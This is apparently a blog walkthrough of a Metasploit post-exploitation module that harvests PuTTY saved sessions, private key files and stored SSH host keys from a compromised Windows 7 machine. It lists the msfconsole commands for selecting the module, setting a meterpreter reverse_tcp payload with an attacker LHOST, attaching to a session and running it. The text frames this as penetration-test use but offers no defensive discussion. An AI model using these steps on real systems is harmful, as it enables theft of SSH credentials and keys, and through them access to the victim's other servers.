This module will identify
whether Pageant (PuTTY Agent) is running and obtain saved session information
from the registry. PuTTY is very configurable; some users may have configured
saved sessions which could include a username, private key file to use when
authenticating, host name etc. If a private key is configured, an attempt will
be made to download and store it in loot. It will also record the SSH host keys
which have been stored. These will be connections that the user has previously
after accepting the host SSH fingerprint and therefore are of particular
interest if they are within scope of a penetration test.
Exploit Targets
Putty
Requirement
Attacker: kali Linux
Victim PC: Windows 7
Open
Kali terminal type msfconsole
Now
type use post/windows/gather/enum_putty_saved_sessions
msf exploit (enum_putty_saved_sessions)>set payload windows/meterpreter/reverse_tcp
msf exploit (enum_putty_saved_sessions)>set lhost 192.168.0.121 (IP
of Local Host)
msf exploit (enum_putty_saved_sessions)>set session 1
msf exploit (enum_putty_saved_sessions)>exploit
The
above exploit will save all session in the specified folder. Open the folder
and click on session file. It will show us the session information.
0 comments:
Post a Comment